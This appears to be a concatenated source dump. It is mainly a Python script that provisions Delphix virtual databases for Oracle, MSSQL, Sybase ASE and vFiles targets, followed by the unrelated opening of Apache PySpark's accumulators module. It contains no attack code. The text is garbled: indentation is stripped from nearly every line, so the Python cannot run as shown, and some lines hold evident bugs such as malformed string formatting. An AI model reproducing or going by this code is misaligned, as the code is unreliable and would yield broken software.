--no_truncate_log Don't truncate log on checkpoint (ASE only)
--environment <name> The name of the Target environment in Delphix
--type <type> The type of VDB this is.
oracle | mssql | ase | vfiles
--prerefresh <name> Pre-Hook commands
--postrefresh <name> Post-Hook commands
  --prerollback <name>      Pre-Hook commands
--postrollback <name> Post-Hook commands
--configure-clone <name> Configure Clone commands
--vdb_restart <bool> Either True or False. Default: False
--envinst <name> The identifier of the instance in Delphix.
ex. "/u01/app/oracle/product/11.2.0/dbhome_1"
ex. LINUXTARGET
--timeflow <name> Name of the timeflow from which you are provisioning
--timestamp_type <type> The type of timestamp you are specifying.
Acceptable Values: TIME, SNAPSHOT
[default: SNAPSHOT]
--timestamp <timepoint_semantic>
The Delphix semantic for the point in time from
which you want to provision your VDB.
Formats:
latest point in time or snapshot: LATEST
point in time: "YYYY-MM-DD HH24:MI:SS"
snapshot name: "@YYYY-MM-DDTHH24:MI:SS.ZZZ"
snapshot time from GUI: "YYYY-MM-DD HH24:MI"
[default: LATEST]
--template <name> Target VDB Template name (Oracle Only)
--mapfile <file> Target VDB mapping file (Oracle Only)
--instname <sid> Target VDB SID name (Oracle Only)
--uniqname <name> Target VDB db_unique_name (Oracle Only)
--mntpoint <path> Mount point for the VDB
[default: /mnt/provision]
--noopen Don't open database after provision (Oracle Only)
--engine <type> Alt Identifier of Delphix engine in dxtools.conf.
--all Run against all engines.
--debug Enable debug logging
--parallel <n> Limit number of jobs to maxjob
--poll <n> The number of seconds to wait between job polls
[default: 10]
--config <path_to_file> The path to the dxtools.conf file
[default: ./dxtools.conf]
--logdir <path_to_file> The path to the logfile you want to use.
[default: ./dx_provision_vdb.log]
-h --help Show this screen.
-v --version Show version.
"""
from __future__ import print_function
import re
import signal
import sys
import time
import traceback
from os.path import basename
from time import sleep
from time import time
from docopt import docopt
from delphixpy.v1_8_0.delphix_engine import DelphixEngine
from delphixpy.v1_8_0.exceptions import HttpError
from delphixpy.v1_8_0.exceptions import JobError
from delphixpy.v1_8_0.exceptions import RequestError
from delphixpy.v1_8_0.web import database
from delphixpy.v1_8_0.web import environment
from delphixpy.v1_8_0.web import group
from delphixpy.v1_8_0.web import job
from delphixpy.v1_8_0.web import repository
from delphixpy.v1_8_0.web import snapshot
from delphixpy.v1_8_0.web import source
from delphixpy.v1_8_0.web.database import template
from delphixpy.v1_8_0.web.vo import AppDataDirectSourceConfig
from delphixpy.v1_8_0.web.vo import AppDataProvisionParameters
from delphixpy.v1_8_0.web.vo import AppDataVirtualSource
from delphixpy.v1_8_0.web.vo import ASEDBContainer
from delphixpy.v1_8_0.web.vo import ASEInstanceConfig
from delphixpy.v1_8_0.web.vo import ASEProvisionParameters
from delphixpy.v1_8_0.web.vo import ASESIConfig
from delphixpy.v1_8_0.web.vo import ASEVirtualSource
from delphixpy.v1_8_0.web.vo import MSSqlDatabaseContainer
from delphixpy.v1_8_0.web.vo import MSSqlProvisionParameters
from delphixpy.v1_8_0.web.vo import MSSqlSIConfig
from delphixpy.v1_8_0.web.vo import MSSqlVirtualSource
from delphixpy.v1_8_0.web.vo import OracleDatabaseContainer
from delphixpy.v1_8_0.web.vo import OracleInstance
from delphixpy.v1_8_0.web.vo import OracleProvisionParameters
from delphixpy.v1_8_0.web.vo import OracleSIConfig
from delphixpy.v1_8_0.web.vo import OracleVirtualSource
from delphixpy.v1_8_0.web.vo import TimeflowPointLocation
from delphixpy.v1_8_0.web.vo import TimeflowPointSemantic
from delphixpy.v1_8_0.web.vo import TimeflowPointTimestamp
from delphixpy.v1_8_0.web.vo import VirtualSourceOperations
from lib.DlpxException import DlpxException
from lib.DxLogging import logging_est
from lib.DxLogging import print_debug
from lib.DxLogging import print_info
from lib.DxTimeflow import DxTimeflow
from lib.GetReferences import find_dbrepo
from lib.GetReferences import find_obj_by_name
from lib.GetSession import GetSession
VERSION = "v.0.2.305"
def create_ase_vdb(
engine, server, jobs, vdb_group, vdb_name, environment_obj, container_obj
):
"""
Create a Sybase ASE VDB
"""
vdb_obj = find_database_by_name_and_group_name(
engine, server, vdb_group.name, vdb_name
)
if vdb_obj == None:
vdb_params = ASEProvisionParameters()
vdb_params.container = ASEDBContainer()
if arguments["--no_truncate_log"]:
vdb_params.truncate_log_on_checkpoint = False
else:
vdb_params.truncate_log_on_checkpoint = True
vdb_params.container.group = vdb_group.reference
vdb_params.container.name = vdb_name
vdb_params.source = ASEVirtualSource()
vdb_params.source_config = ASESIConfig()
vdb_params.source_config.database_name = arguments["--db"]
vdb_params.source_config.instance = ASEInstanceConfig()
vdb_params.source_config.instance.host = environment_obj.host
vdb_repo = find_dbrepo_by_environment_ref_and_name(
engine,
server,
"ASEInstance",
environment_obj.reference,
arguments["--envinst"],
)
vdb_params.source_config.repository = vdb_repo.reference
vdb_params.timeflow_point_parameters = set_timeflow_point(
engine, server, container_obj
)
vdb_params.timeflow_point_parameters.container = container_obj.reference
print_info("Provisioning " + vdb_name)
database.provision(server, vdb_params)
# Add the job into the jobs dictionary so we can track its progress
jobs[engine["hostname"]] = server.last_job
# return the job object to the calling statement so that we can tell if
# a job was created or not (will return None, if no job)
return server.last_job
else:
print_info(engine["hostname"] + ": " + vdb_name + " already exists.")
return vdb_obj.reference
def create_mssql_vdb(engine, jobs, vdb_group, vdb_name, environment_obj, container_obj):
"""
Create a MSSQL VDB
engine:
jobs:
vdb_group:
vdb_name,
environment_obj:
container_obj:
"""
vdb_obj = find_database_by_name_and_group_name(
engine, dx_session_obj.server_session, vdb_group.name, vdb_name
)
if vdb_obj == None:
vdb_params = MSSqlProvisionParameters()
vdb_params.container = MSSqlDatabaseContainer()
vdb_params.container.group = vdb_group.reference
vdb_params.container.name = vdb_name
vdb_params.source = MSSqlVirtualSource()
vdb_params.source.allow_auto_vdb_restart_on_host_reboot = False
vdb_params.source_config = MSSqlSIConfig()
vdb_params.source_config.database_name = arguments["--db"]
vdb_params.source_config.repository = find_dbrepo(
dx_session_obj.server_session,
"MSSqlInstance",
environment_obj.reference,
arguments["--envinst"],
).reference
vdb_params.timeflow_point_parameters = set_timeflow_point(
engine, dx_session_obj.server_session, container_obj
)
if not vdb_params.timeflow_point_parameters:
return
vdb_params.timeflow_point_parameters.container = container_obj.reference
print_info(engine["hostname"] + ":Provisioning " + vdb_name)
database.provision(dx_session_obj.server_session, vdb_params)
# Add the job into the jobs dictionary so we can track its progress
jobs[engine["hostname"]] = dx_session_obj.server_session.last_job
# return the job object to the calling statement so that we can tell if
# a job was created or not (will return None, if no job)
return dx_session_obj.server_session.last_job
else:
print_info(engine["hostname"] + ": " + vdb_name + " already exists.")
return vdb_obj.reference
def create_vfiles_vdb(
engine,
jobs,
vfiles_group,
vfiles_name,
environment_obj,
container_obj,
pre_refresh=None,
post_refresh=None,
pre_rollback=None,
post_rollback=None,
configure_clone=None,
):
"""
Create a Vfiles VDB
"""
vfiles_obj = None
try:
vfiles_obj = find_obj_by_name(
dx_session_obj.server_session, database, vfiles_name
)
except DlpxException:
pass
if vfiles_obj is None:
vfiles_repo = find_repo_by_environment_ref(
engine, "Unstructured Files", environment_obj.reference
)
vfiles_params = AppDataProvisionParameters()
vfiles_params.source = AppDataVirtualSource()
vfiles_params.source_config = AppDataDirectSourceConfig()
vdb_restart_reobj = re.compile("true", re.IGNORECASE)
if vdb_restart_reobj.search(str(arguments["--vdb_restart"])):
vfiles_params.source.allow_auto_vdb_restart_on_host_reboot = True
elif vdb_restart_reobj.search(str(arguments["--vdb_restart"])) is None:
vfiles_params.source.allow_auto_vdb_restart_on_host_reboot = False
vfiles_params.container = {
"type": "AppDataContainer",
"group": vfiles_group.reference,
"name": vfiles_name,
}
vfiles_params.source_config.name = arguments["--target"]
vfiles_params.source_config.path = arguments["--vfiles_path"]
vfiles_params.source_config.environment_user = environment_obj.primary_user
vfiles_params.source_config.repository = vfiles_repo.reference
vfiles_params.source.parameters = {}
        vfiles_params.source.name = vfiles_name
vfiles_params.source.operations = VirtualSourceOperations()
if pre_refresh:
vfiles_params.source.operations.pre_refresh = [
{"type": "RunCommandOnSourceOperation", "command": pre_refresh}
]
if post_refresh:
vfiles_params.source.operations.post_refresh = [
{"type": "RunCommandOnSourceOperation", "command": post_refresh}
]
if pre_rollback:
vfiles_params.source.operations.pre_rollback = [
{"type": "RunCommandOnSourceOperation", "command": pre_rollback}
]
if post_rollback:
vfiles_params.source.operations.post_rollback = [
{"type": "RunCommandOnSourceOperation", "command": post_rollback}
]
if configure_clone:
vfiles_params.source.operations.configure_clone = [
{"type": "RunCommandOnSourceOperation", "command": configure_clone}
]
if arguments["--timestamp_type"] is None:
vfiles_params.timeflow_point_parameters = {
"type": "TimeflowPointSemantic",
"container": container_obj.reference,
"location": "LATEST_POINT",
}
elif arguments["--timestamp_type"].upper() == "SNAPSHOT":
try:
dx_timeflow_obj = DxTimeflow(dx_session_obj.server_session)
dx_snap_params = dx_timeflow_obj.set_timeflow_point(
container_obj,
arguments["--timestamp_type"],
arguments["--timestamp"],
arguments["--timeflow"],
)
except RequestError as e:
raise DlpxException("Could not set the timeflow point:\n%s" % (e))
if dx_snap_params.type == "TimeflowPointSemantic":
vfiles_params.timeflow_point_parameters = {
"type": dx_snap_params.type,
"container": dx_snap_params.container,
"location": dx_snap_params.location,
}
elif dx_snap_params.type == "TimeflowPointTimestamp":
vfiles_params.timeflow_point_parameters = {
"type": dx_snap_params.type,
"timeflow": dx_snap_params.timeflow,
"timestamp": dx_snap_params.timestamp,
}
print_info("%s: Provisioning %s\n" % (engine["hostname"], vfiles_name))
try:
database.provision(dx_session_obj.server_session, vfiles_params)
except (JobError, RequestError, HttpError) as e:
raise DlpxException(
"\nERROR: Could not provision the database:" "\n%s" % (e)
)
# Add the job into the jobs dictionary so we can track its progress
jobs[engine["hostname"]] = dx_session_obj.server_session.last_job
# return the job object to the calling statement so that we can tell if
# a job was created or not (will return None, if no job)
return dx_session_obj.server_session.last_job
else:
print_info(
"\nERROR %s: %s already exists. \n" % (engine["hostname"], vfiles_name)
)
return vfiles_obj.reference
def create_oracle_si_vdb(
engine,
jobs,
vdb_name,
vdb_group_obj,
environment_obj,
container_obj,
pre_refresh=None,
post_refresh=None,
pre_rollback=None,
post_rollback=None,
configure_clone=None,
):
"""
Create an Oracle SI VDB
"""
vdb_obj = None
try:
vdb_obj = find_obj_by_name(dx_session_obj.server_session, database, vdb_name)
except DlpxException:
pass
if vdb_obj == None:
vdb_params = OracleProvisionParameters()
vdb_params.open_resetlogs = True
if arguments["--noopen"]:
vdb_params.open_resetlogs = False
vdb_params.container = OracleDatabaseContainer()
vdb_params.container.group = vdb_group_obj.reference
vdb_params.container.name = vdb_name
vdb_params.source = OracleVirtualSource()
vdb_params.source.allow_auto_vdb_restart_on_host_reboot = False
if arguments["--instname"]:
inst_name = arguments["--instname"]
elif arguments["--instname"] == None:
inst_name = vdb_name
if arguments["--uniqname"]:
unique_name = arguments["--uniqname"]
elif arguments["--uniqname"] == None:
unique_name = vdb_name
if arguments["--db"]:
db = arguments["--db"]
elif arguments["--db"] == None:
db = vdb_name
vdb_params.source.mount_base = arguments["--mntpoint"]
if arguments["--mapfile"]:
vdb_params.source.file_mapping_rules = arguments["--mapfile"]
if arguments["--template"]:
template_obj = find_obj_by_name(
dx_session_obj.server_session,
database.template,
arguments["--template"],
)
vdb_params.source.config_template = template_obj.reference
vdb_params.source_config = OracleSIConfig()
vdb_params.source.operations = VirtualSourceOperations()
if pre_refresh:
vdb_params.source.operations.pre_refresh = [
{"type": "RunCommandOnSourceOperation", "command": pre_refresh}
]
if post_refresh:
vdb_params.source.operations.post_refresh = [
{"type": "RunCommandOnSourceOperation", "command": post_refresh}
]
if pre_rollback:
vdb_params.source.operations.pre_rollback = [
{"type": "RunCommandOnSourceOperation", "command": pre_rollback}
]
if post_rollback:
vdb_params.source.operations.post_rollback = [
{"type": "RunCommandOnSourceOperation", "command": post_rollback}
]
if configure_clone:
vdb_params.source.operations.configure_clone = [
{"type": "RunCommandOnSourceOperation", "command": configure_clone}
]
vdb_repo = find_dbrepo_by_environment_ref_and_install_path(
engine,
dx_session_obj.server_session,
"OracleInstall",
environment_obj.reference,
arguments["--envinst"],
)
vdb_params.source_config.database_name = db
vdb_params.source_config.unique_name = unique_name
vdb_params.source_config.instance = OracleInstance()
vdb_params.source_config.instance.instance_name = inst_name
vdb_params.source_config.instance.instance_number = 1
vdb_params.source_config.repository = vdb_repo.reference
dx_timeflow_obj = DxTimeflow(dx_session_obj.server_session)
vdb_params.timeflow_point_parameters = dx_timeflow_obj.set_timeflow_point(
container_obj, arguments["--timestamp_type"], arguments["--timestamp"]
)
print(vdb_params, "\n\n\n")
print_info(engine["hostname"] + ": Provisioning " + vdb_name)
database.provision(dx_session_obj.server_session, vdb_params)
# Add the job into the jobs dictionary so we can track its progress
jobs[engine["hostname"]] = dx_session_obj.server_session.last_job
# return the job object to the calling statement so that we can tell if
# a job was created or not (will return None, if no job)
return dx_session_obj.server_session.last_job
else:
raise DlpxException(
"\nERROR: %s: %s alread exists\n" % (engine["hostname"], vdb_name)
)
def find_all_databases_by_group_name(
engine, server, group_name, exclude_js_container=False
):
"""
Easy way to quickly find databases by group name
"""
# First search groups for the name specified and return its reference
group_obj = find_obj_by_name(dx_session_obj.server_session, group, group_name)
if group_obj:
databases = database.get_all(
server,
group=group_obj.reference,
no_js_container_data_source=exclude_js_container,
)
return databases
def find_database_by_name_and_group_name(engine, server, group_name, database_name):
databases = find_all_databases_by_group_name(engine, server, group_name)
for each in databases:
if each.name == database_name:
print_debug(
"%s: Found a match %s" % (engine["hostname"], str(each.reference))
)
return each
print_info(
"%s unable to find %s in %s" % (engine["hostname"], database_name, group_name)
)
def find_dbrepo_by_environment_ref_and_install_path(
engine, server, install_type, f_environment_ref, f_install_path
):
"""
Function to find database repository objects by environment reference and
install path, and return the object's reference as a string
You might use this function to find Oracle and PostGreSQL database repos.
"""
print_debug(
"%s: Searching objects in the %s class for one with the "
"environment reference of %s and an install path of %s"
% (engine["hostname"], install_type, f_environment_ref, f_install_path),
debug,
)
for obj in repository.get_all(server, environment=f_environment_ref):
if install_type == "PgSQLInstall":
if obj.type == install_type and obj.installation_path == f_install_path:
print_debug(
"%s: Found a match %s" % (engine["hostname"], str(obj.reference)),
debug,
)
return obj
elif install_type == "OracleInstall":
if obj.type == install_type and obj.installation_home == f_install_path:
print_debug(
"%s: Fount a match %s" % (engine["hostname"], str(obj.reference)),
debug,
)
return obj
else:
raise DlpxException(
"%s: No Repo match found for type %s.\n"
% (engine["hostname"], install_type)
)
def find_repo_by_environment_ref(
engine, repo_type, f_environment_ref, f_install_path=None
):
"""
Function to find unstructured file repository objects by environment
reference and name, and return the object's reference as a string
You might use this function to find Unstructured File repos.
"""
print_debug(
"\n%s: Searching objects in the %s class for one with the"
"environment reference of %s\n"
% (engine["hostname"], repo_type, f_environment_ref),
debug,
)
obj_ref = ""
all_objs = repository.get_all(
dx_session_obj.server_session, environment=f_environment_ref
)
for obj in all_objs:
if obj.name == repo_type:
print_debug(engine["hostname"] + ": Found a match " + str(obj.reference))
return obj
elif obj.type == repo_type:
print_debug(
"%s Found a match %s" % (engine["hostname"], str(obj.reference)), debug
)
return obj
raise DlpxException(
"%s: No Repo match found for type %s\n" % (engine["hostname"], repo_type)
)
def find_dbrepo_by_environment_ref_and_name(
    engine, server, repo_type, f_environment_ref, f_name
):
"""
Function to find database repository objects by environment reference and
name, and return the object's reference as a string
You might use this function to find MSSQL database repos.
"""
print_debug(
"%s: Searching objects in the %s class for one with the "
"environment reference of %s and a name of %s."
% (engine["hostname"], repo_type, f_environment_ref, f_name),
debug,
)
obj_ref = ""
all_objs = repository.get_all(server, environment=f_environment_ref)
for obj in all_objs:
if repo_type == "MSSqlInstance" or repo_type == "ASEInstance":
if obj.type == repo_type and obj.name == f_name:
print_debug(
"%s: Found a match %s" % (engine["hostname"], str(obj.reference)),
debug,
)
return obj
elif repo_type == "Unstructured Files":
            if obj.name == repo_type:
print_debug(
"%s: Found a match %s" % (engine["hostname"], str(obj.reference)),
debug,
)
return obj
raise DlpxException(
"%s: No Repo match found for type %s\n" % (engine["hostname"], repo_type)
)
def find_snapshot_by_database_and_name(engine, database_obj, snap_name):
"""
Find snapshots by database and name. Return snapshot reference.
engine: Dictionary of engines from config file.
database_obj: Database object to find the snapshot against
snap_name: Name of the snapshot
"""
snapshots = snapshot.get_all(
dx_session_obj.server_session, database=database_obj.reference
)
matches = []
for snapshot_obj in snapshots:
if str(snapshot_obj.name).startswith(arguments["--timestamp"]):
matches.append(snapshot_obj)
for each in matches:
print_debug(each.name, debug)
if len(matches) == 1:
print_debug(
"%s: Found one and only one match. This is good.\n %s"
% (engine["hostname"], matches[0]),
debug,
)
return matches[0]
elif len(matches) > 1:
raise DlpxException(
"%s: The name specified was not specific enough."
" More than one match found.\n" % (engine["hostname"],)
)
else:
raise DlpxException(
"%s: No matches found for the time specified.\n" % (engine["hostname"])
)
def find_snapshot_by_database_and_time(engine, database_obj, snap_time):
snapshots = snapshot.get_all(
dx_session_obj.server_session, database=database_obj.reference
)
matches = []
for snapshot_obj in snapshots:
if str(snapshot_obj.latest_change_point.timestamp).startswith(
arguments["--timestamp"]
):
matches.append(snapshot_obj)
if len(matches) == 1:
print_debug(
'%s": Found one and only one match. This is good.\n%s'
% (engine["hostname"], matches[0]),
debug,
)
return matches[0]
elif len(matches) > 1:
print_debug(matches, debug)
raise DlpxException(
"%s: The time specified was not specific enough."
"More than one match found.\n" % (engine["hostname"])
)
else:
raise DlpxException(
"%s: No matches found for the time specified.\n" % (engine["hostname"])
)
def find_source_by_database(engine, database_obj):
# The source tells us if the database is enabled/disables, virtual,
# vdb/dSource, or is a staging database.
    source_obj = source.get_all(dx_session_obj.server_session, database=database_obj.reference)
# We'll just do a little sanity check here to ensure we only have a 1:1
# result.
if len(source_obj) == 0:
raise DlpxException(
"%s: Did not find a source for %s. Exiting.\n"
% (engine["hostname"], database_obj.name)
)
elif len(source_obj) > 1:
raise DlpxException(
"%s: More than one source returned for %s. "
"Exiting.\n" % (engine["hostname"], database_obj.name + ". Exiting")
)
return source_obj
def run_async(func):
"""
http://code.activestate.com/recipes/576684-simple-threading-decorator/
run_async(func)
function decorator, intended to make "func" run in a separate
thread (asynchronously).
Returns the created Thread object
E.g.:
@run_async
def task1():
do_something
@run_async
def task2():
do_something_too
t1 = task1()
t2 = task2()
...
t1.join()
t2.join()
"""
from threading import Thread
from functools import wraps
@wraps(func)
def async_func(*args, **kwargs):
func_hl = Thread(target=func, args=args, kwargs=kwargs)
func_hl.start()
return func_hl
return async_func
@run_async
def main_workflow(engine):
"""
This function actually runs the jobs.
Use the @run_async decorator to run this function asynchronously.
This allows us to run against multiple Delphix Engine simultaneously
engine: Dictionary containing engine information
"""
# Establish these variables as empty for use later
environment_obj = None
source_objs = None
jobs = {}
try:
# Setup the connection to the Delphix Engine
dx_session_obj.serversess(
engine["ip_address"], engine["username"], engine["password"]
)
group_obj = find_obj_by_name(
dx_session_obj.server_session, group, arguments["--target_grp"]
)
# Get the reference of the target environment.
print_debug("Getting environment for %s\n" % (host_name), debug)
# Get the environment object by the hostname
environment_obj = find_obj_by_name(
dx_session_obj.server_session, environment, host_name
)
except DlpxException as e:
print(
"\nERROR: Engine %s encountered an error while provisioning "
"%s:\n%s\n" % (engine["hostname"], arguments["--target"], e)
)
sys.exit(1)
print_debug(
"Getting database information for %s\n" % (arguments["--source"]), debug
)
try:
# Get the database reference we are copying from the database name
database_obj = find_obj_by_name(
dx_session_obj.server_session, database, arguments["--source"]
)
except DlpxException:
return
thingstodo = ["thingtodo"]
# reset the running job count before we begin
i = 0
try:
with dx_session_obj.job_mode(single_thread):
while len(jobs) > 0 or len(thingstodo) > 0:
arg_type = arguments["--type"].lower()
if len(thingstodo) > 0:
if arg_type == "oracle":
create_oracle_si_vdb(
engine,
jobs,
database_name,
group_obj,
environment_obj,
database_obj,
arguments["--prerefresh"],
arguments["--postrefresh"],
arguments["--prerollback"],
arguments["--postrollback"],
arguments["--configure-clone"],
)
elif arg_type == "ase":
create_ase_vdb(
engine,
server,
jobs,
group_obj,
database_name,
environment_obj,
database_obj,
)
elif arg_type == "mssql":
create_mssql_vdb(
engine,
jobs,
group_obj,
database_name,
environment_obj,
database_obj,
)
elif arg_type == "vfiles":
create_vfiles_vdb(
engine,
jobs,
group_obj,
database_name,
environment_obj,
database_obj,
arguments["--prerefresh"],
arguments["--postrefresh"],
arguments["--prerollback"],
arguments["--postrollback"],
arguments["--configure-clone"],
)
thingstodo.pop()
# get all the jobs, then inspect them
i = 0
for j in jobs.keys():
job_obj = job.get(dx_session_obj.server_session, jobs[j])
print_debug(job_obj, debug)
print_info(
engine["hostname"] + ": VDB Provision: " + job_obj.job_state
)
if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
# If the job is in a non-running state, remove it from
# the running jobs list.
del jobs[j]
else:
# If the job is in a running state, increment the
# running job count.
i += 1
print_info("%s: %s jobs running." % (engine["hostname"], str(i)))
# If we have running jobs, pause before repeating the checks.
if len(jobs) > 0:
sleep(float(arguments["--poll"]))
except (DlpxException, JobError) as e:
print("\nError while provisioning %s:\n%s" % (database_name, e.message))
sys.exit(1)
def run_job():
"""
This function runs the main_workflow aynchronously against all the servers
specified
No arguments required for run_job().
"""
# Create an empty list to store threads we create.
threads = []
# If the --all argument was given, run against every engine in dxtools.conf
if arguments["--all"]:
print_info("Executing against all Delphix Engines in the dxtools.conf")
try:
# For each server in the dxtools.conf...
for delphix_engine in dx_session_obj.dlpx_engines:
                engine = dx_session_obj.dlpx_engines[delphix_engine]
# Create a new thread and add it to the list.
threads.append(main_workflow(engine))
except DlpxException as e:
print("Error encountered in main_workflow:\n%s" % (e))
sys.exit(1)
elif arguments["--all"] is False:
# Else if the --engine argument was given, test to see if the engine
# exists in dxtools.conf
if arguments["--engine"]:
try:
engine = dx_session_obj.dlpx_engines[arguments["--engine"]]
print_info(
"Executing against Delphix Engine: %s\n" % (arguments["--engine"])
)
except (DlpxException, RequestError, KeyError) as e:
raise DlpxException(
"\nERROR: Delphix Engine %s cannot be "
"found in %s. Please check your value "
"and try again. Exiting.\n"
% (arguments["--engine"], config_file_path)
)
        else:
            # Else search for a default engine in the dxtools.conf
            engine = None
            for delphix_engine in dx_session_obj.dlpx_engines:
if dx_session_obj.dlpx_engines[delphix_engine]["default"] == "true":
engine = dx_session_obj.dlpx_engines[delphix_engine]
print_info(
"Executing against the default Delphix Engine "
"in the dxtools.conf: %s"
% (dx_session_obj.dlpx_engines[delphix_engine]["hostname"])
)
break
if engine == None:
raise DlpxException("\nERROR: No default engine found. Exiting")
# run the job against the engine
threads.append(main_workflow(engine))
# For each thread in the list...
for each in threads:
# join them back together so that we wait for all threads to complete
# before moving on
each.join()
def serversess(f_engine_address, f_engine_username, f_engine_password):
"""
Function to setup the session with the Delphix Engine
"""
server_session = DelphixEngine(
f_engine_address, f_engine_username, f_engine_password, "DOMAIN"
)
return server_session
def set_exit_handler(func):
"""
This function helps us set the correct exit code
"""
signal.signal(signal.SIGTERM, func)
def set_timeflow_point(engine, server, container_obj):
"""
This returns the reference of the timestamp specified.
"""
if arguments["--timestamp_type"].upper() == "SNAPSHOT":
if arguments["--timestamp"].upper() == "LATEST":
print_debug("%s: Using the latest Snapshot." % (engine["hostname"]), debug)
timeflow_point_parameters = TimeflowPointSemantic()
timeflow_point_parameters.container = container_obj.reference
timeflow_point_parameters.location = "LATEST_SNAPSHOT"
elif arguments["--timestamp"].startswith("@"):
print_debug("%s: Using a named snapshot" % (engine["hostname"]), debug)
            snapshot_obj = find_snapshot_by_database_and_name(
                engine, container_obj, arguments["--timestamp"]
            )
if snapshot_obj != None:
timeflow_point_parameters = TimeflowPointLocation()
timeflow_point_parameters.timeflow = snapshot_obj.timeflow
timeflow_point_parameters.location = (
snapshot_obj.latest_change_point.location
)
else:
raise DlpxException(
"%s: Was unable to use the specified "
"snapshot %s for database %s\n"
% (engine["hostname"], arguments["--timestamp"], container_obj.name)
)
else:
print_debug(
"%s: Using a time-designated snapshot" % (engine["hostname"]), debug
)
            snapshot_obj = find_snapshot_by_database_and_time(
                engine, container_obj, arguments["--timestamp"]
            )
if snapshot_obj != None:
timeflow_point_parameters = TimeflowPointTimestamp()
timeflow_point_parameters.timeflow = snapshot_obj.timeflow
timeflow_point_parameters.timestamp = (
snapshot_obj.latest_change_point.timestamp
)
else:
raise DlpxException(
"%s: Was unable to find a suitable time "
" for %s for database %s.\n"
% (engine["hostname"], arguments["--timestamp"], container_obj.name)
)
elif arguments["--timestamp_type"].upper() == "TIME":
if arguments["--timestamp"].upper() == "LATEST":
timeflow_point_parameters = TimeflowPointSemantic()
timeflow_point_parameters.location = "LATEST_POINT"
else:
raise DlpxException(
"%s: Only support a --timestamp value of "
'"latest" when used with timestamp_type '
"of time" % s(engine["hostname"])
)
else:
raise DlpxException(
"%s is not a valied timestamp_type. Exiting\n"
% (arguments["--timestamp_type"])
)
timeflow_point_parameters.container = container_obj.reference
return timeflow_point_parameters
def time_elapsed():
"""
This function calculates the time elapsed since the beginning of the script.
Call this anywhere you want to note the progress in terms of time
"""
elapsed_minutes = round((time() - time_start) / 60, +1)
return elapsed_minutes
def update_jobs_dictionary(engine, server, jobs):
"""
This function checks each job in the dictionary and updates its status or
removes it if the job is complete.
Return the number of jobs still running.
"""
# Establish the running jobs counter, as we are about to update the count
# from the jobs report.
i = 0
# get all the jobs, then inspect them
for j in jobs.keys():
job_obj = job.get(server, jobs[j])
print_debug("%s: %s" % (engine["hostname"], str(job_obj)), debug)
print_info("%s: %s: %s" % (engine["hostname"], j.name, job_obj.job_state))
if job_obj.job_state in ["CANCELED", "COMPLETED", "FAILED"]:
# If the job is in a non-running state, remove it from the running
# jobs list.
del jobs[j]
else:
# If the job is in a running state, increment the running job count.
i += 1
return i
def main(argv):
# We want to be able to call on these variables anywhere in the script.
global single_thread
global usebackup
global time_start
global config_file_path
global database_name
global host_name
global dx_session_obj
global debug
try:
dx_session_obj = GetSession()
debug = arguments["--debug"]
logging_est(arguments["--logdir"], debug)
print_debug(arguments, debug)
time_start = time()
single_thread = False
config_file_path = arguments["--config"]
print_info("Welcome to %s version %s" % (basename(__file__), VERSION))
# Parse the dxtools.conf and put it into a dictionary
dx_session_obj.get_config(config_file_path)
database_name = arguments["--target"]
host_name = arguments["--environment"]
# This is the function that will handle processing main_workflow for
# all the servers.
run_job()
elapsed_minutes = time_elapsed()
print_info("script took %s minutes to get this far. " % (str(elapsed_minutes)))
# Here we handle what we do when the unexpected happens
except SystemExit as e:
"""
This is what we use to handle our sys.exit(#)
"""
sys.exit(e)
except DlpxException as e:
"""
We use this exception handler when an error occurs in a function call.
"""
print("\nERROR: Please check the ERROR message below:\n%s" % (e.message))
sys.exit(2)
except HttpError as e:
"""
We use this exception handler when our connection to Delphix fails
"""
print(
"\nERROR: Connection failed to the Delphix Engine. Please "
"check the ERROR message below:\n%s" % (e.message)
)
sys.exit(2)
except JobError as e:
"""
We use this exception handler when a job fails in Delphix so
that we have actionable data
"""
print("A job failed in the Delphix Engine:\n%s"(e.job))
elapsed_minutes = time_elapsed()
print_info(
"%s took %s minutes to get this far"
% (basename(__file__), str(elapsed_minutes))
)
sys.exit(3)
except KeyboardInterrupt:
"""
We use this exception handler to gracefully handle ctrl+c exits
"""
print_debug("You sent a CTRL+C to interrupt the process")
elapsed_minutes = time_elapsed()
print_info(
"%s took %s minutes to get this far"
% (basename(__file__), str(elapsed_minutes))
)
except:
"""
Everything else gets caught here
"""
print(sys.exc_info()[0])
print(traceback.format_exc())
elapsed_minutes = time_elapsed()
print_info(
"%s took %s minutes to get this far"
% (basename(__file__), str(elapsed_minutes))
)
sys.exit(1)
if __name__ == "__main__":
# Grab our arguments from the doc at the top of the script
arguments = docopt(__doc__, version=basename(__file__) + " " + VERSION)
# Feed our arguments to the main function, and off we go!
main(arguments)
|
accumulators.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
import select
import struct
import socketserver as SocketServer
import threading
from pyspark.serializers import read_int, PickleSerializer
__all__ = ['Accumulator', 'AccumulatorParam']
pickleSer = PickleSerializer()
# Holds accumulators registered on the current machine, keyed by ID. This is then used to send
# the local accumulator updates back to the driver program at the end of a task.
_accumulatorRegistry = {}
def _deserialize_accumulator(aid, zero_value, accum_param):
from pyspark.accumulators import _accumulatorRegistry
# If this certain accumulator was deserialized, don't overwrite it.
if aid in _accumulatorRegistry:
return _accumulatorRegistry[aid]
else:
accum = Accumulator(aid, zero_value, accum_param)
accum._deserialized = True
_accumulatorRegistry[aid] = accum
return accum
class Accumulator(object):
"""
A shared variable that can be accumulated, i.e., has a commutative and associative "add"
operation. Worker tasks on a Spark cluster can add values to an Accumulator with the `+=`
operator, but only the driver program is allowed to access its value, using `value`.
Updates from the workers get propagated automatically to the driver program.
While :class:`SparkContext` supports accumulators for primitive data types like :class:`int` and
:class:`float`, users can also define accumulators for custom types by providing a custom
:py:class:`AccumulatorParam` object. Refer to its doctest for an example.
Examples
--------
>>> a = sc.accumulator(1)
>>> a.value
1
>>> a.value = 2
>>> a.value
2
>>> a += 5
>>> a.value
7
>>> sc.accumulator(1.0).value
1.0
>>> sc.accumulator(1j).value
1j
